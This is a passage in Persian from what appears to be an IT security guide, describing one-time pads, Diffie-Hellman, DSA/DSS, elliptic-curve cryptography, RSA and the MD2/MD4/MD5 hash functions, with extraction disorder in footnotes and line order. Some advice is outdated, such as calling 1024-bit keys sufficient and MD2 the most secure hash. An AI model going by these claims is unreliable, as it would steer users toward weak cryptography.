‫ﺍﺯ ﺑﻴﻦ ﻣﻲﺭﻭﺩ ﻭ ﺩﻳﮕﺮ ﻫﻴﭽﮕﺎﻩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻧﻤﻲﮔﻴﺮﺩ‪ .‬ﭼﻮﻥ ﻛﻠﻴﺪ ﺗﺼﺎﺩﻓﻲ ﻭ ﻏﻴﺮ ﺗﻜﺮﺍﺭﺷﻮﻧﺪﻩ ﺍﺳﺖ‪ ،‬ﺣﺘﻲ ﻳﻚ ﺣﻤﻠـﺔ ﺟـﺴﺘﺠﻮﻱ‬
‫ﻛﻠﻴﺪ ﻧﻴﺰ ﻋﻤﻠﻲ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ‪ ،‬ﭼﺮﺍﻛﻪ ﺑﺎ ﻫﺮ ﻛﻠﻴﺪ ﺧﺎﺹ‪ ،‬ﻫﺮ ﭘﻴﺎﻡ ﻣﻤﻜﻦ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻮﻟﻴﺪ ﺷﻮﺩ‪.‬‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﻳﻦ ﺩﺳﺘﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺑﺴﻴﺎﺭﻱ ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﻏﻴﺮﻋﻤﻠـﻲ ﻣـﻲﻛﻨـﺪ‪ .‬ﻋـﻼﻭﻩ ﺑـﺮ ﻣـﺸﻜﻼﺕ ﻣﻌﻤـﻮﻝ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ )ﺗﺒﺎﺩﻝ ﻭ ﻧﮕﻬﺪﺍﺭﻱ ﺍﻳﻤﻦ ﻛﻠﻴﺪﻫﺎ( ﺗﻮﻟﻴﺪ ﻣﻘﺎﺩﻳﺮ ﺯﻳﺎﺩ ﺩﺍﺩﻩﻫﺎﻱ ﻭﺍﻗﻌﹰﺎ ﺗﺼﺎﺩﻓﻲ ﻫﻤﻴﺸﻪ ﺳﺎﺩﻩ ﻧﻴـﺴﺖ‪ ،‬ﻭ ﺗﻮﺯﻳـﻊ ﻣﻘـﺎﺩﻳﺮ ﺯﻳـﺎﺩ‬
‫ﻲ ﻧﻴﺎﺯﻣﻨـﺪ ﺑـﻪ‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻛﻠﻴﺪ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺸﻜﻞﺳﺎﺯ ﺑﺎﺷﺪ‪ .‬ﺑﺎ ﻫﻤﺔ ﺍﻳﻦ ﺍﻭﺻﺎﻑ ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﻛﻤﺎﺑﻴﺶ ﺑﺮﺍﻱ ﭘﻴﻮﻧﺪﻫﺎﻱ ﺍﺭﺗﺒـﺎﻃ ﹺ‬
‫ﺍﻣﻨﻴﺖ ﻓﻮﻕﺍﻟﻌﺎﺩﻩ ﺯﻳﺎﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺍﻟﮕﻮﺭﻳﺘﻢﻫﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ‬
‫ﭘﺪﻳﺪ ﺁﻭﺭﺩﻥ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻣﺸﻜﻠﺘﺮ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﺍﺳﺖ ﻭ ﺗﻌﺪﺍﺩ ﻛﻤﺘﺮﻱ ﺍﺯ ﺁﻧﻬﺎ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﺩﺍﺭﻧﺪ‪ .‬ﭼﻮﻥ ﻛﻠﻴﺪﻫﺎﻱ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﻭ ﻧﺎﻣﺘﻘﺎﺭﻥ ﺍﺳﺎﺳﹰﺎ ﺑﻪ ﺻﻮﺭﺗﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪ ،‬ﺑﺎ ﻣﻘﺎﻳـﺴﺔ‬
‫‪Roland Rivest‬‬
‫‪Joan Daemen‬‬
‫‪Vinet Rijmen‬‬
‫‪National Institute of Standards & Technology‬‬
‫‪92‬‬
‫‪93‬‬
‫‪94‬‬
‫‪95‬‬
‫‪٢٩٧‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫ﻃﻮﻝ ﻛﻠﻴﺪﻫﺎ ﻧﻤﻲﺗﻮﺍﻥ ﺑﻪ ﺍﺳﺘﺤﻜﺎﻡ ﻧﺴﺒﻲ ﻭ ﻗﺪﺭﺕ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﭘﻲﺑﺮﺩ‪ .‬ﻃﻮﻝ ﻛﻠﻴﺪ ﺩﺭ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴـﺪ ﺭﻣـﺰ ﻫﻤﮕـﺎﻧﻲ‬
‫ﻻ ﺍﺯ ‪ ۵۱۲‬ﺗﺎ ‪ ۲۰۴۸‬ﻭ ‪ ۴۰۹۶‬ﺑﻴﺖ ﺍﺳﺖ‪ ،‬ﻭ ﺍﻟﺒﺘﻪ ﺑﺮﺍﻱ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺎﺭﺑﺮﺍﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻃـﻮﻝ ‪ ۱۰۲۴‬ﺑﻴـﺖ ﺑـﺮﺍﻱ ﺁﻳﻨـﺪﻩﺍﻱ ﻗﺎﺑـﻞ‬
‫ﻣﻌﻤﻮ ﹰ‬
‫ﭘﻴﺶﺑﻴﻨﻲ ﻛﺎﻓﻲ ﺍﺳﺖ‪ .‬ﻓﻬﺮﺳﺖ ﺯﻳﺮ‪ ،‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻣﺘﺪﺍﻭﻝ ﺍﻣﺮﻭﺯ ﺭﺍ ﺧﻼﺻﻪ ﻛﺮﺩﻩ ﺍﺳﺖ‪:‬‬
‫‪Diffie-Hellman‬‬
‫ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﺮﺍﻱ ﻣﺒﺎﺩﻟـﺔ ﻛﻠﻴـﺪﻫﺎﻱ ﺭﻣﺰﻧﮕـﺎﺭﻱ ﻣﻴـﺎﻥ ﻃﺮﻓﻬـﺎﻱ ﺍﺭﺗﺒـﺎﻁ‪ Diffie-Hellman .‬ﺩﺭ ﺣﻘﻴﻘـﺖ ﻳـﻚ ﺭﻭﺵ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻭ‬
‫ﺭﻣﺰﮔﺸﺎﻳﻲ ﻧﻴﺴﺖ‪ ،‬ﺑﻠﻜﻪ ﻳﻚ ﺭﻭﺵ ﺗﻮﺳﻌﻪ ﻭ ﺗﺒﺎﺩﻝ ﻳﻚ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻣﺸﺘﺮﻙ ﺭﻭﻱ ﻳﻚ ﻛﺎﻧﺎﻝ ﺍﺭﺗﺒﺎﻃﻲ ﻫﻤﮕﺎﻧﻲ ﺍﺳـﺖ‪ .‬ﺩﺭ ﻭﺍﻗـﻊ ﺩﻭ‬
‫ﻃﺮﻑ ﺍﺭﺗﺒﺎﻁ ﺑﺮ ﺳﺮ ﭼﻨﺪ ﻣﻘﺪﺍﺭ ﻋﺪﺩﻱ ﻣﺘﺪﺍﻭﻝ ﺗﻮﺍﻓﻖ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻭ ﺁﻧﮕﺎﻩ ﻫﺮ ﻃﺮﻑ ﻳﻚ ﻛﻠﻴﺪ ﭘﺪﻳـﺪ ﻣـﻲﺁﻭﺭﺩ‪ .‬ﺗﺒـﺪﻳﻼﺕ ﺭﻳﺎﺿـﻲ ﻛﻠﻴـﺪﻫﺎ‬
‫ﻣﺒﺎﺩﻟﻪ ﻣﻲﺷﻮﺩ‪ ،‬ﻭ ﺁﻧﮕﺎﻩ ﻫﺮ ﻃﺮﻑ ﺍﺭﺗﺒﺎﻁ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﻛﻠﻴﺪ ﻧﺸﺴﺖ‪ ٩٦‬ﺛﺎﻟﺚ ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻛﻨـﺪ ﻛـﻪ ﺗﻮﺳـﻂ ﻣﻬـﺎﺟﻤﻲ ﻛـﻪ ﻫـﺮ ﺩﻭ ﻣﻘـﺪﺍﺭ‬
‫ﺗﺒﺎﺩﻝﺷﺪﻩ ﺭﺍ ﻣﻲﺩﺍﻧﺪ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺁﺳﺎﻧﻲ ﺑﺪﺳﺖ ﺁﻳﺪ‪.‬‬
‫‪DSA/DSS‬‬
‫‪٩٧‬‬
‫‪٩٨‬‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ )‪ (DSS‬ﺗﻮﺳﻂ ﺁﮊﺍﻧﺲ ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺗﻮﺳﻌﻪ ﻳﺎﻓﺖ ﻭ ﺗﻮﺳﻂ ﻣﺆﺳﺴﺔ ﻣﻠﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻭ ﻓﻨﺎﻭﺭﻱ‬
‫ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻋﻤﻮﻣﻲ ﭘﺮﺩﺍﺯﺵ ﺍﻃﻼﻋﺎﺕ )‪ ٩٩(FIPS‬ﺍﻧﺘﺨـﺎﺏ ﺷـﺪ‪ DSS .‬ﺑـﺮ ﺍﺳـﺎﺱ ﺍﻟﮕـﻮﺭﻳﺘﻢ ﺍﻣـﻀﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ )‪(DSA‬‬
‫ﭘﺎﻳﻪﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﮔﺮﭼﻪ ‪ DSA‬ﻫﺮ ﻃﻮﻟﻲ ﺭﺍ ﺑﺮﺍﻱ ﻛﻠﻴﺪ ﻣﺠﺎﺯ ﻣﻲﺷﻤﺎﺭﺩ‪ ،‬ﻭﻟﻲ ﺩﺭ ‪ DSS FIPS‬ﻓﻘﻂ ﻛﻠﻴﺪﻫﺎﻱ ﺑﺎ ﻃﻮﻝ ﺑـﻴﻦ ‪۵۱۲‬‬
‫ﻭ ‪ ۱۰۲۴‬ﺑﻴﺖ ﻣﺠﺎﺯ ﻫﺴﺘﻨﺪ‪ .‬ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﮔﻔﺘﻪ ﺷﺪ ‪ DSS‬ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﻜﺎﺭ ﺭﻭﺩ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗـﻮﺍﻥ ﺍﺯ ﻳـﻚ‬
‫ﻧﻮﻉ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ‪ DSA‬ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻫﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬
‫‪١٠٠‬‬
‫ﻣﻨﺤﻨﻲﻫﺎﻱ ﺑﻴﻀﻮﻱ‬
‫ﻱ ﻛﻠﻴﺪ ﻫﻤﮕﺎﻧﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺠﺎﻱ ﺭﻭﺵ ﻗﺪﻳﻤﻲ ﺗﻮﺍﺑﻊ ﻟﮕﺎﺭﻳﺘﻤﻲ‪ ،‬ﻣﺒﺘﻨﻲ ﺑﺮ‬
‫ﻱ ﺭﻣﺰﮔﺬﺍﺭ ﹺ‬
‫ﻲ ﺑﻴﻀﻮﻱ ﺳﻴﺴﺘﻤﻬﺎ ﹺ‬
‫ﻱ ﻣﻨﺤﻨ ﹺ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭ ﹺ‬
‫ﻣﻨﺤﻨﻲﻫﺎﻱ ﺑﻴﻀﻮﻱ ﻣﻲﺑﺎﺷﻨﺪ‪ .‬ﻣﺰﻳﺖ ﻛﺎﺭﺑﺮﺩ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻨﺤﻨﻲ ﺑﻴﻀﻮﻱ ﺍﺯ ﺍﻳﻦ ﺣﻘﻴﻘﺖ ﻧـﺸﺄﺕ ﻣـﻲﮔﻴـﺮﺩ ﻛـﻪ ﻫـﻴﭻ ﺍﻟﮕـﻮﺭﻳﺘﻢ ﻗﺎﺑـﻞ‬
‫ﻣﺤﺎﺳﺒﻪﺍﻱ ﺑﺮﺍﻱ ﻣﺤﺎﺳﺒﺔ ﻟﮕﺎﺭﻳﺘﻤﻬﺎﻱ ﻣﻨﻔﺼﻞ ﻣﻨﺤﻨﻴﻬﺎﻱ ﺑﻴﻀﻮﻱ ﺷﻨﺎﺧﺘﻪ ﻧﺸﺪﻩ ﺍﺳﺖ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻛﻠﻴﺪﻫﺎﻱ ﻛﻮﺗﺎﻩ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻨﺤﻨﻲ ﺑﻴﻀﻮﻱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭﺟﻪ ﺑﺎﻻﺋﻲ ﺍﺯ ﻣﺤﺮﻣﺎﻧﮕﻲ ﻭ ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﻪ ﺍﺭﻣﻐﺎﻥ ﺑﻴﺎﻭﺭﻧﺪ‪ ،‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻜﻪ ﻣﺤﺎﺳﺒﺎﺕ ﺁﻧﻬﺎ ﻫﻢ ﺑﺴﻴﺎﺭ‬
‫ﺳﺮﻳﻊ ﺍﺳﺖ‪ .‬ﻣﻨﺤﻨﻲﻫﺎﻱ ﺑﻴﻀﻮﻱ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﻛﺎﺭﺍﻳﻲ ﺑﺎﻻ ﺑﺼﻮﺭﺕ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﻮﻧﺪ‪.‬‬
‫‪RSA‬‬
‫ﺳﻴﺴﺘﻢ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪ .‬ﺍﻣﻀﺎﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺍﺛﺒﺎﺕ ﺍﺻﺎﻟﺖ ﻳﺎ ﺳﻨﺪﻳﺖ ﺍﻃﻼﻋﺎﺕ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﻜﺎﺭ ﺭﻭﻧـﺪ‪ .‬ﺩﺭ‬
‫ﺍﻳﻦ ﺳﻴﺴﺘﻢ‪ ،‬ﻛﻠﻴﺪ ﺭﻣﺰ ﺑﺴﺘﻪ ﺑﻪ ﻧﻮﻋﻲ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﻪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﻫﺮ ﻃﻮﻟﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ‬
‫ﻻ ‪ ۱۲۸‬ﺗﺎ ‪ ۲۵۶‬ﺑﻴـﺖ ﻃـﻮﻝ‬
‫ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺍﻃﻼﻋﺎﺕ ﺩﺭﻭﻥ ﻳﻚ ﻓﺎﻳﻞ )ﺑﺰﺭﮒ ﻳﺎ ﻛﻮﭼﻚ( ﺭﺍ ﺑﻪ ﻳﻚ ﻋﺪﺩ ﺑﺰﺭﮒ ﺗﺒﺪﻳﻞ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﺩﺍﺭﺩ‪ .‬ﺑﻬﺘﺮﻳﻦ ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﻭﺍﺟﺪ ﻭﻳﮋﮔﻴﻬﺎﻱ ﺯﻳﺮ ﻫﺴﺘﻨﺪ‪:‬‬
‫‪Session Key‬‬
‫‪Digital Signature Standard‬‬
‫)‪U.S. National Security Agency (NSA‬‬
‫‪Federal Information Processing Standard‬‬
‫‪Digital Signature Algorithm‬‬
‫‪Adi Shamir‬‬
‫‪Leonard Adleman‬‬
‫‪96‬‬
‫‪97‬‬
‫‪98‬‬
‫‪99‬‬
‫‪100‬‬
‫‪101‬‬
‫‪102‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫‪ RSA‬ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺸﻬﻮﺭ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻫﻤﮕﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺳﺎﻝ ‪ ۱۹۷۷‬ﻣﻴﻼﺩﻱ ﺗﻮﺳﻂ ﺳﻪ ﺍﺳﺘﺎﺩ ﺩﺍﻧﺸﮕﺎﻩ ‪ MIT‬ﺑﻪ ﻧﺎﻣﻬﺎﻱ ﺭﻭﻟﻨﺪ‬
‫ﺭﻳﻮﺳﺖ‪ ،‬ﺍﺩﻱ ﺷﻤﻴﺮ‪ ،١٠١‬ﻭ ﻟﺌﻮﻧﺎﺭﺩ ﺁﺩﻟﻤﻦ‪ ١٠٢‬ﭘﺪﻳﺪ ﺁﻣﺪ‪ .‬ﺍﺯ ‪ RSA‬ﻫﻢ ﻣﻲﺗﻮﺍﻥ ﺑﺮﺍﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﻫـﻢ ﺑﻌﻨـﻮﺍﻥ ﻣﺒﻨـﺎﻱ ﻳـﻚ‬
‫‪٢٩٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺍﻟﻒ( ﻫﺮ ﺑﻴﺖ ﺧﺮﻭﺟﻲ ﺗﺎﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺑﺼﻮﺭﺕ ﺑﺎﻟﻘﻮﻩ ﺗﺤﺖﺗﺄﺛﻴﺮ ﻫﻤﺔ ﺑﻴﺘﻬﺎﻱ ﻭﺭﻭﺩﻱ ﺗﺎﺑﻊ ﺍﺳﺖ‪.‬‬
‫ﺏ( ﺍﮔﺮ ﻳﻚ ﺑﻴﺖ ﻣﻔﺮﻭﺽ ﻭﺭﻭﺩﻱ ﺗﺎﺑﻊ ﺗﻐﻴﻴﺮ ﻛﻨﺪ‪ ،‬ﻫﺮ ﺑﻴﺖ ﺧﺮﻭﺟﻲ ﺗﺎﺑﻊ ‪ ۵۰‬ﺩﺭﺻﺪ ﺷﺎﻧﺲ ﺗﻐﻴﻴﺮ ﻛﺮﺩﻥ ﺩﺍﺭﺩ‪.‬‬
‫ﺝ( ﺍﮔﺮ ﻳﻚ ﻓﺎﻳﻞ ﻭﺭﻭﺩﻱ ﻭ ﺧﻼﺻﻪﭘﻴﺎﻡ ﻣﺘﻨﺎﻇﺮ ﺁﻧﺮﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﻢ‪ ،‬ﺍﺯ ﻧﻈﺮ ﻣﺤﺎﺳﺒﺎﺗﻲ ﻧﺒﺎﻳﺪ ﺗﻮﺍﻧﺴﺖ ﻓﺎﻳﻞ ﺩﻳﮕﺮﻱ ﺑﺎ ﻣﻘﺪﺍﺭ ﺧﻼﺻﻪﭘﻴﺎﻡ‬
‫ﻣﺸﺎﺑﻪ ﭘﻴﺪﺍ ﻛﺮﺩ‪.‬‬
‫ﺍﺯ ﻟﺤﺎﻅ ﻧﻈﺮﻱ ﺩﻭ ﻓﺎﻳﻞ ﻣﺘﻔﺎﻭﺕ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻘﺪﺍﺭ ﺧﻼﺻﻪﭘﻴﺎﻡ ﻣﺸﺎﺑﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺗﻼﻗﻲ‪ ١٠٣‬ﻧﺎﻡ ﺩﺍﺭﺩ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﻳـﻚ ﺗـﺎﺑﻊ‬
‫ﺧﻼﺻﻪﭘﻴﺎﻡ ﺍﻳﻤﻦ ﺑﺎﺷﺪ‪ ،‬ﻻﺯﻡ ﺍﺳﺖ ﺍﺯ ﻧﻈﺮ ﻣﺤﺎﺳﺒﺎﺗﻲ ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﻳﺎ ﺗﻮﻟﻴﺪ ﺍﻳﻦ ﺗﻼﻗﻲﻫﺎ ﻋﻤﻠﻲ ﻧﺒﺎﺷﺪ‪.‬‬
‫ﻼ ﭼﻨﺪ ﻧﻤﻮﻧﻪ ﺫﻛﺮ ﺷﺪﻩ ﺍﺳﺖ‪:‬‬
‫ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺑﺴﻴﺎﺭﻱ ﺍﺭﺍﺋﻪ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﻫﻢ ﺍﻛﻨﻮﻥ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ .‬ﺫﻳ ﹰ‬
‫‪MD2‬‬
‫‪١٠٤‬‬
‫ﺗﺎﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺷﻤﺎﺭﺓ ‪ ،۲‬ﺗﻮﺳﻂ ﺭﻭﻟﻨﺪ ﺭﻳﻮﺳﺖ ﭘﺪﻳﺪ ﺁﻣﺪ‪ .‬ﺍﻳﻦ ﺗﺎﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺩﺭ ﻣﻴﺎﻥ ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺍﻳﻤﻦﺗﺮﻳﻦ ﺗـﺎﺑﻊ ﺭﻳﻮﺳـﺖ‬
‫ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﻣﺤﺎﺳﺒﺎﺗﺶ ﻧﻴﺰ ﺑﻴﺸﺘﺮﻳﻦ ﺯﻣﺎﻥ ﺭﺍ ﻣﻲﮔﻴﺮﺩ‪ .‬ﺩﺭﻧﺘﻴﺠﻪ ‪ MD2‬ﺑﻨﺪﺭﺕ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣـﻲﮔﻴـﺮﺩ‪ MD2 .‬ﻳـﻚ ﺧﻼﺻـﺔ ‪۱۲۸‬‬
‫ﺑﻴﺘﻲ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ‪.‬‬
‫‪MD4‬‬
‫"ﺧﻼﺻﻪﭘﻴﺎﻡ ﺷﻤﺎﺭﺓ ‪ "۴‬ﻫﻢ ﺗﻮﺳﻂ ﺭﻭﻟﻨﺪ ﺭﻳﻮﺳﺖ ﭘﺪﻳﺪ ﺁﻣﺪ‪ .‬ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺟﺎﻳﮕﺰﻳﻦ ﺳﺮﻳﻌﺘﺮ ﺑـﺮﺍﻱ ‪ MD2‬ﺍﺑـﺪﺍﻉ‬
‫ﺷﺪ‪ .‬ﻣﺘﻌﺎﻗﺒﹰﺎ ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﺷﺪ ﻛﻪ ‪ MD4‬ﻧﻘﺎﻁ ﺿﻌﻒ ﺑﺎﻟﻘﻮﻩ ﺩﺍﺭﺩ‪ .‬ﻳﻌﻨﻲ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻓﺎﻳﻠﻲ ﭘﻴﺪﺍ ﺷﻮﺩ ﻛﻪ ‪ MD4‬ﻣـﺸﺎﺑﻬﻲ ﺑـﺎ‬
‫ﻳﻚ ﻓﺎﻳﻞ ﺩﺍﺩﻩ ﺷﺪﻩ ﺗﻮﻟﻴﺪ ﻛﻨﺪ‪ ،‬ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﻧﻴﺎﺯ ﺑﻪ ﺟﺴﺘﺠﻮﻱ ‪ brute force‬ﺑﺎﺷﺪ )ﻛﻪ ﺍﻟﺒﺘﻪ ﺑﻪ ﻫﻤﺎﻥ ﺩﻟﻴﻞ ﻛﻪ ﺟـﺴﺘﺠﻮ ﺩﺭ ﻓـﻀﺎﻱ ﻛﻠﻴـﺪ ‪۱۲۸‬‬
‫ﺑﻴﺘﻲ ﻋﻤﻠﻲ ﻧﻴﺴﺖ‪ ،‬ﺟﺴﺘﺠﻮﻱ ‪ brute force‬ﻫﻢ ﻋﻤﻠﻲ ﻧﻤﻲﺑﺎﺷﺪ(‪ MD4 .‬ﻧﻴﺰ ﻳﻚ ﺧﻼﺻﺔ ‪ ۱۲۸‬ﺑﻴﺘﻲ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ‪.‬‬
‫‪MD5‬‬
‫"ﺧﻼﺻﻪﭘﻴﺎﻡ ﺷﻤﺎﺭﻩ ‪ "۵‬ﻧﻴﺰ ﺗﻮﺳﻂ ﺭﻭﻟﻨﺪ ﺭﻳﻮﺳﺖ ﭘﺪﻳﺪ ﺁﻣﺪ‪ ،MD5 .‬ﺍﺻﻼﺡ ﺷﺪﺓ ‪ MD4‬ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺗﻜﻨﻴﻜﻬﺎﻳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﻛـﻪ ﺑـﺮﺍﻱ‬
‫ﺍﻳﻤﻦﺗﺮ ﻛﺮﺩﻥ ﺁﻥ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺍﮔﺮﭼﻪ ﺍﺯ ‪ MD5‬ﺑﻪ ﻭﻓﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ ،‬ﺩﺭ ﺗﺎﺑﺴﺘﺎﻥ ‪ ۱۹۹۶‬ﭼﻨﺪ ﻧﻘﺺ ﺩﺭ ﺁﻥ ﻛﺸﻒ ﺷﺪ ﻛﻪ ﻣﻮﺟﺐ‬
‫ﺷﺪ ﮔﻮﻧﻪﻫﺎﺋﻲ ﺍﺯ ﺗﻼﻗﻲﻫﺎ ﺭﺍ ﺑﺘﻮﺍﻥ ﺩﺭ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺿﻌﻴﻒﺷﺪﺓ ﺁﻥ ﻣﺤﺎﺳﺒﻪ ﻛﺮﺩ‪ .‬ﺩﺭﻧﺘﻴﺠﻪ ‪ MD5‬ﺁﺭﺍﻡ ﺁﺭﺍﻡ ﺭﻭﺍﺝ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﻣـﻲﺩﻫـﺪ‪.‬‬
